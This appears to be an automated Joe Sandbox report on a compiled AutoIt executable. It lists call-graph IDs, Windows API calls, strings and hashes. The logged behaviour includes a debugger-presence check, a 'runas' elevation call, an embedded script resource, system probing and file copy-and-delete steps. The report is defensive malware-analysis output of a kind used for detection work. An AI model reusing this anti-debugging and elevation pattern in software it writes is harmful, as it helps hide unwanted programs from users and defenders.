106394->106305 106396 100408d 106395->106396 106397 10040a0 106396->106397 106398 1004092 106396->106398 106400 fa7667 59 API calls 106397->106400 106399 fa8047 59 API calls 106398->106399 106448 100409b Mailbox 106399->106448 106401 10040a8 106400->106401 106402 fa7667 59 API calls 106401->106402 106403 10040b0 106402->106403 106404 fa7667 59 API calls 106403->106404 106405 10040bb 106404->106405 106406 fa7667 59 API calls 106405->106406 106407 10040c3 106406->106407 106408 fa7667 59 API calls 106407->106408 106409 10040cb 106408->106409 106410 fa7667 59 API calls 106409->106410 106411 10040d3 106410->106411 106412 fa7667 59 API calls 106411->106412 106413 10040db 106412->106413 106414 fa7667 59 API calls 106413->106414 106415 10040e3 106414->106415 106416 fa459b 59 API calls 106415->106416 106417 10040fa 106416->106417 106418 fa459b 59 API calls 106417->106418 106419 1004113 106418->106419 106420 fa79f2 59 API calls 106419->106420 106422 100411f 106420->106422 106421 1004132 106424 fa79f2 59 API calls 106421->106424 106422->106421 106423 fa7d2c 59 API calls 106422->106423 106423->106421 106425 100413b 106424->106425 106426 100414b 106425->106426 106427 fa7d2c 59 API calls 106425->106427 106428 fa8047 59 API calls 106426->106428 106427->106426 106429 1004157 106428->106429 106430 fa7b2e 59 API calls 106429->106430 106431 1004163 106430->106431 106507 1004223 59 API calls 106431->106507 106433 1004172 106508 1004223 59 API calls 106433->106508 106448->106378 106450 1009162 __ftell_nolock 106449->106450 106451 fc0db6 Mailbox 59 API calls 106450->106451 106452 10091bf 106451->106452 106453 fa522e 59 API calls 106452->106453 106454 10091c9 106453->106454 106455 1008f5f GetSystemTimeAsFileTime 106454->106455 106456 10091d4 106455->106456 106457 fa4ee5 85 API calls 106456->106457 106458 10091e7 _wcscmp 106457->106458 106459 10092b8 106458->106459 106460 100920b 106458->106460 106461 1009734 96 API calls 106459->106461 106462 1009734 96 API calls 106460->106462 106463 1009284 _wcscat 106461->106463 106464 1009210 106462->106464 106466 fa4f0b 74 API calls 106463->106466 106487 10092c1 106463->106487 106464->106487 106526 fc40fb 58 API calls __wsplitpath_helper 106464->106526 106467 10092dd 106466->106467 106468 fa4f0b 74 API calls 106467->106468 106470 10092ed 106468->106470 106469 1009239 _wcscat _wcscpy 106527 fc40fb 58 API calls __wsplitpath_helper 106469->106527 106471 fa4f0b 74 API calls 106470->106471 106473 1009308 106471->106473 106474 fa4f0b 74 API calls 106473->106474 106475 1009318 106474->106475 106476 fa4f0b 74 API calls 106475->106476 106477 1009333 106476->106477 106478 fa4f0b 74 API calls 106477->106478 106479 1009343 106478->106479 106480 fa4f0b 74 API calls 106479->106480 106487->106384 106504->106311 106505->106349 106506->106361 106507->106433 106526->106469 106527->106463 106547 fa1066 106552 faf76f 106547->106552 106549 fa106c 106550 fc2d40 __cinit 67 API calls 106549->106550 106551 fa1076 106550->106551 106553 faf790 106552->106553 106585 fbff03 106553->106585 106557 faf7d7 106558 fa7667 59 API calls 106557->106558 106559 faf7e1 106558->106559 106560 fa7667 59 API calls 106559->106560 106561 faf7eb 106560->106561 106562 fa7667 59 API calls 106561->106562 106563 faf7f5 106562->106563 106564 fa7667 59 API calls 106563->106564 106565 faf833 106564->106565 106566 fa7667 59 API calls 106565->106566 106567 faf8fe 106566->106567 106595 fb5f87 106567->106595 106571 faf930 106572 fa7667 59 API calls 106571->106572 106573 faf93a 106572->106573 106623 fbfd9e 106573->106623 106575 faf981 106576 faf991 GetStdHandle 106575->106576 106577 fe45ab 106576->106577 106578 faf9dd 106576->106578 106577->106578 106580 fe45b4 106577->106580 106579 faf9e5 OleInitialize 106578->106579 106579->106549 106630 1006b38 64 API calls Mailbox 106580->106630 106582 fe45bb 106631 1007207 CreateThread 106582->106631 106584 fe45c7 CloseHandle 106584->106579 106632 fbffdc 106585->106632 106588 fbffdc 59 API calls 106589 fbff45 106588->106589 106590 fa7667 59 API calls 106589->106590 106591 fbff51 106590->106591 106592 fa7bcc 59 API calls 106591->106592 106593 faf796 106592->106593 106594 fc0162 6 API calls 106593->106594 106594->106557 106596 fa7667 59 API calls 106595->106596 106597 fb5f97 106596->106597 106598 fa7667 59 API calls 106597->106598 106599 fb5f9f 106598->106599 106639 fb5a9d 106599->106639 106602 fb5a9d 59 API calls 106603 fb5faf 106602->106603 106604 fa7667 59 API calls 106603->106604 106605 fb5fba 106604->106605 106606 fc0db6 Mailbox 59 API calls 106605->106606 106607 faf908 106606->106607 106608 fb60f9 106607->106608 106609 fb6107 106608->106609 106610 fa7667 59 API calls 106609->106610 106611 fb6112 106610->106611 106612 fa7667 59 API calls 106611->106612 106613 fb611d 106612->106613 106614 fa7667 59 API calls 106613->106614 106615 fb6128 106614->106615 106616 fa7667 59 API calls 106615->106616 106617 fb6133 106616->106617 106618 fb5a9d 59 API calls 106617->106618 106619 fb613e 106618->106619 106620 fc0db6 Mailbox 59 API calls 106619->106620 106621 fb6145 RegisterWindowMessageW 106620->106621 106621->106571 106624 ff576f 106623->106624 106625 fbfdae 106623->106625 106642 1009ae7 60 API calls 106624->106642 106626 fc0db6 Mailbox 59 API calls 106625->106626 106628 fbfdb6 106626->106628 106628->106575 106629 ff577a 106630->106582 106631->106584 106643 10071ed 65 API calls 106631->106643 106633 fa7667 59 API calls 106632->106633 106634 fbffe7 106633->106634 106635 fa7667 59 API calls 106634->106635 106636 fbffef 106635->106636 106637 fa7667 59 API calls 106636->106637 106638 fbff3b 106637->106638 106638->106588 106640 fa7667 59 API calls 106639->106640 106641 fb5aa5 106640->106641 106641->106602 106642->106629 106644 fa1016 106649 fa4974 106644->106649 106647 fc2d40 __cinit 67 API calls 106648 fa1025 106647->106648 106650 fc0db6 Mailbox 59 API calls 106649->106650 106651 fa497c 106650->106651 106652 fa101b 106651->106652 106656 fa4936 106651->106656 106652->106647 106657 fa493f 106656->106657 106659 fa4951 106656->106659 106658 fc2d40 __cinit 67 API calls 106657->106658 106658->106659 106660 fa49a0 106659->106660 106661 fa7667 59 API calls 106660->106661 106662 fa49b8 GetVersionExW 106661->106662 106663 fa7bcc 59 API calls 106662->106663 106664 fa49fb 106663->106664 106665 fa7d2c 59 API calls 106664->106665 106676 fa4a28 106664->106676 106666 fa4a1c 106665->106666 106667 fa7726 59 API calls 106666->106667 106667->106676 106668 fa4a93 GetCurrentProcess IsWow64Process 106669 fa4aac 106668->106669 106671 fa4b2b GetSystemInfo 106669->106671 106672 fa4ac2 106669->106672 106670 fdd864 106674 fa4af8 106671->106674 106684 fa4b37 106672->106684 106674->106652 106676->106668 106676->106670 106677 fa4b1f GetSystemInfo 106680 fa4ae9 106677->106680 106678 fa4ad4 106679 fa4b37 2 API calls 106678->106679 106681 fa4adc GetNativeSystemInfo 106679->106681 106680->106674 106682 fa4aef FreeLibrary 106680->106682 106681->106680 106682->106674 106685 fa4ad0 106684->106685 106686 fa4b40 LoadLibraryA 106684->106686 106685->106677 106685->106678 106686->106685 106687 fa4b51 GetProcAddress 106686->106687 106687->106685 106688 1008d0d 106689 1008d20 106688->106689 106690 1008d1a 106688->106690 106692 fc2d55 _free 58 API calls 106689->106692 106694 1008d31 106689->106694 106691 fc2d55 _free 58 API calls 106690->106691 106691->106689 106692->106694 106693 1008d43 106694->106693 106695 fc2d55 _free 58 API calls 106694->106695 106695->106693 106696 fa1055 106701 fa2649 106696->106701 106699 fc2d40 __cinit 67 API calls 106700 fa1064 106699->106700 106702 fa7667 59 API calls 106701->106702 106703 fa26b7 106702->106703 106709 fa3582 106703->106709 106705 fdc069 106707 fa2754 106707->106705 106708 fa105a 106707->106708 106712 fa3416 59 API calls 2 library calls 106707->106712 106708->106699 106713 fa35b0 106709->106713 106712->106707 106714 fa35a1 106713->106714 106715 fa35bd 106713->106715 106714->106707 106715->106714 106716 fa35c4 RegOpenKeyExW 106715->106716 106716->106714 106717 fa35de RegQueryValueExW 106716->106717 106718 fa3614 RegCloseKey 106717->106718 106719 fa35ff 106717->106719 106718->106714 106719->106718

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                        • Part of subcall function 00FB092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FA3C14,010652F8,?,?,?), ref: 00FB096E
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01057770,00000010), ref: 00FDD281
                                                                      • SetCurrentDirectoryW.KERNEL32(?,010652F8,?,?,?), ref: 00FDD2B9
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01054260,010652F8,?,?,?), ref: 00FDD33F
                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FDD346
                                                                        • Part of subcall function 00FA3A46: GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
                                                                        • Part of subcall function 00FA3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
                                                                        • Part of subcall function 00FA3A46: LoadIconW.USER32(00000063), ref: 00FA3A76
                                                                        • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A4), ref: 00FA3A88
                                                                        • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A2), ref: 00FA3A9A
                                                                        • Part of subcall function 00FA3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
                                                                        • Part of subcall function 00FA3A46: RegisterClassExW.USER32(?), ref: 00FA3B16
                                                                        • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
                                                                        • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
                                                                        • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
                                                                        • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
                                                                        • Part of subcall function 00FA434A: _memset.LIBCMT ref: 00FA4370
                                                                        • Part of subcall function 00FA434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
                                                                      Strings
                                                                      • runas, xrefs: 00FDD33A
                                                                      • This is a third-party compiled AutoIt script., xrefs: 00FDD279
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                                      • API String ID: 529118366-3287110873
                                                                      • Opcode ID: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
                                                                      • Instruction ID: 4d5e202afb158beb9fd10a048aab9bbd6c6617ce790dcd9f1a8e34c8b23896c0
                                                                      • Opcode Fuzzy Hash: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
                                                                      • Instruction Fuzzy Hash: 18514AB1D0420AAECF21EFB5DC06EFD7BB9AF477A0F004059F491A6152CA795605FB21

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 996 fa49a0-fa4a00 call fa7667 GetVersionExW call fa7bcc 1001 fa4b0b-fa4b0d 996->1001 1002 fa4a06 996->1002 1003 fdd767-fdd773 1001->1003 1004 fa4a09-fa4a0e 1002->1004 1007 fdd774-fdd778 1003->1007 1005 fa4b12-fa4b13 1004->1005 1006 fa4a14 1004->1006 1010 fa4a15-fa4a4c call fa7d2c call fa7726 1005->1010 1006->1010 1008 fdd77b-fdd787 1007->1008 1009 fdd77a 1007->1009 1008->1007 1011 fdd789-fdd78e 1008->1011 1009->1008 1019 fa4a52-fa4a53 1010->1019 1020 fdd864-fdd867 1010->1020 1011->1004 1013 fdd794-fdd79b 1011->1013 1013->1003 1015 fdd79d 1013->1015 1018 fdd7a2-fdd7a5 1015->1018 1021 fdd7ab-fdd7c9 1018->1021 1022 fa4a93-fa4aaa GetCurrentProcess IsWow64Process 1018->1022 1019->1018 1023 fa4a59-fa4a64 1019->1023 1024 fdd869 1020->1024 1025 fdd880-fdd884 1020->1025 1021->1022 1026 fdd7cf-fdd7d5 1021->1026 1032 fa4aaf-fa4ac0 1022->1032 1033 fa4aac 1022->1033 1027 fa4a6a-fa4a6c 1023->1027 1028 fdd7ea-fdd7f0 1023->1028 1029 fdd86c 1024->1029 1030 fdd86f-fdd878 1025->1030 1031 fdd886-fdd88f 1025->1031 1034 fdd7df-fdd7e5 1026->1034 1035 fdd7d7-fdd7da 1026->1035 1036 fdd805-fdd811 1027->1036 1037 fa4a72-fa4a75 1027->1037 1038 fdd7fa-fdd800 1028->1038 1039 fdd7f2-fdd7f5 1028->1039 1029->1030 1030->1025 1031->1029 1040 fdd891-fdd894 1031->1040 1041 fa4b2b-fa4b35 GetSystemInfo 1032->1041 1042 fa4ac2-fa4ad2 call fa4b37 1032->1042 1033->1032 1034->1022 1035->1022 1047 fdd81b-fdd821 1036->1047 1048 fdd813-fdd816 1036->1048 1044 fa4a7b-fa4a8a 1037->1044 1045 fdd831-fdd834 1037->1045 1038->1022 1039->1022 1040->1030 1046 fa4af8-fa4b08 1041->1046 1053 fa4b1f-fa4b29 GetSystemInfo 1042->1053 1054 fa4ad4-fa4ae1 call fa4b37 1042->1054 1051 fa4a90 1044->1051 1052 fdd826-fdd82c 1044->1052 1045->1022 1050 fdd83a-fdd84f 1045->1050 1047->1022 1048->1022 1055 fdd859-fdd85f 1050->1055 1056 fdd851-fdd854 1050->1056 1051->1022 1052->1022 1058 fa4ae9-fa4aed 1053->1058 1061 fa4b18-fa4b1d 1054->1061 1062 fa4ae3-fa4ae7 GetNativeSystemInfo 1054->1062 1055->1022 1056->1022 1058->1046 1060 fa4aef-fa4af2 FreeLibrary 1058->1060 1060->1046 1061->1062 1062->1058
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00FA49CD
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • GetCurrentProcess.KERNEL32(?,0102FAEC,00000000,00000000,?), ref: 00FA4A9A
                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00FA4AA1
                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FA4AE7
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FA4AF2
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00FA4B23
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00FA4B2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                      • String ID:
                                                                      • API String ID: 1986165174-0
                                                                      • Opcode ID: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
                                                                      • Instruction ID: 0f679460154b689cd85d7bd419e1839f2c75ea18e975ef6d3025b304bca3b106
                                                                      • Opcode Fuzzy Hash: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
                                                                      • Instruction Fuzzy Hash: 919102719897C1DEC731DF6884502AABFF5AF6A310F58499ED0C683B02D264B908E769

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1063 fa4e89-fa4ea1 CreateStreamOnHGlobal 1064 fa4ea3-fa4eba FindResourceExW 1063->1064 1065 fa4ec1-fa4ec6 1063->1065 1066 fa4ec0 1064->1066 1067 fdd933-fdd942 LoadResource 1064->1067 1066->1065 1067->1066 1068 fdd948-fdd956 SizeofResource 1067->1068 1068->1066 1069 fdd95c-fdd967 LockResource 1068->1069 1069->1066 1070 fdd96d-fdd98b 1069->1070 1070->1066
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4E99
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4EB0
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD937
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD94C
                                                                      • LockResource.KERNEL32(00FA4D8E,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F,00000000), ref: 00FDD95F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
                                                                      • Instruction ID: 96881683f966eceb3b9d2da17f78c40e3c01ed8ddbf2a5ad7e2853a9bb19d048
                                                                      • Opcode Fuzzy Hash: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
                                                                      • Instruction Fuzzy Hash: CD114CB5640701ABD7318F65EC88F677BBAEBC6B51F204268F44596250DBA2E8049660
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00FDE398), ref: 0100446A
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0100447B
                                                                      • FindClose.KERNEL32(00000000), ref: 0100448B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
                                                                      • Instruction ID: 34c455d664bfa9a2c399a00f8cf1703d80cca51428215897ba6fd0db01e847da
                                                                      • Opcode Fuzzy Hash: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
                                                                      • Instruction Fuzzy Hash: 17E0D8324105016752326E38EC0D4EE77AC9E06275F20474AF9B5C10C0EF7859048699
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0A5B
                                                                      • timeGetTime.WINMM ref: 00FB0D16
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0E53
                                                                      • Sleep.KERNEL32(0000000A), ref: 00FB0E61
                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00FB0EFA
                                                                      • DestroyWindow.USER32 ref: 00FB0F06
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FB0F20
                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00FE4E83
                                                                      • TranslateMessage.USER32(?), ref: 00FE5C60
                                                                      • DispatchMessageW.USER32(?), ref: 00FE5C6E
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE5C82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                      • API String ID: 4212290369-3242690629
                                                                      • Opcode ID: bc34a68c52a1d2062eee4cb2ff83d070bf4cfc6b74d63080bc3df8950e87418c
                                                                      • Instruction ID: 9ed69ea58b8d705ba5c6a7cd149d6e952d11f22bf692b2d2850dc176d45392d7
                                                                      • Opcode Fuzzy Hash: bc34a68c52a1d2062eee4cb2ff83d070bf4cfc6b74d63080bc3df8950e87418c
                                                                      • Instruction Fuzzy Hash: DFB20270608782DFD734DF25C884BABB7E4BF85718F14491DE589872A1CB79E844EB82

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 01008F5F: __time64.LIBCMT ref: 01008F69
                                                                        • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
                                                                      • __wsplitpath.LIBCMT ref: 01009234
                                                                        • Part of subcall function 00FC40FB: __wsplitpath_helper.LIBCMT ref: 00FC413B
                                                                      • _wcscpy.LIBCMT ref: 01009247
                                                                      • _wcscat.LIBCMT ref: 0100925A
                                                                      • __wsplitpath.LIBCMT ref: 0100927F
                                                                      • _wcscat.LIBCMT ref: 01009295
                                                                      • _wcscat.LIBCMT ref: 010092A8
                                                                        • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FDE
                                                                        • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FED
                                                                      • _wcscmp.LIBCMT ref: 010091EF
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01009452
                                                                      • _wcsncpy.LIBCMT ref: 010094C5
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 010094FB
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01009511
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009522
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009534
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 1500180987-0
                                                                      • Opcode ID: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                      • Instruction ID: d56839f5e9c8569490163cf2969622ac77bceab98d49c47ad5b2bf54d6d3b3eb
                                                                      • Opcode Fuzzy Hash: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                      • Instruction Fuzzy Hash: D0C15CB1D00219AEDF21DF95CC81EDEBBBDEF95304F0040AAE609E7181EB749A449F61

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                      • Instruction ID: b534c2f238e59b7e13bfa13bfdbc73700c3b9116f6ef83bab3c348fba4385b2b
                                                                      • Opcode Fuzzy Hash: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                      • Instruction Fuzzy Hash: 7A3136B184534AAFDB60CFA4E889A8DBBF0FB09390F24455EE5C0E6294D3BA0585CF51

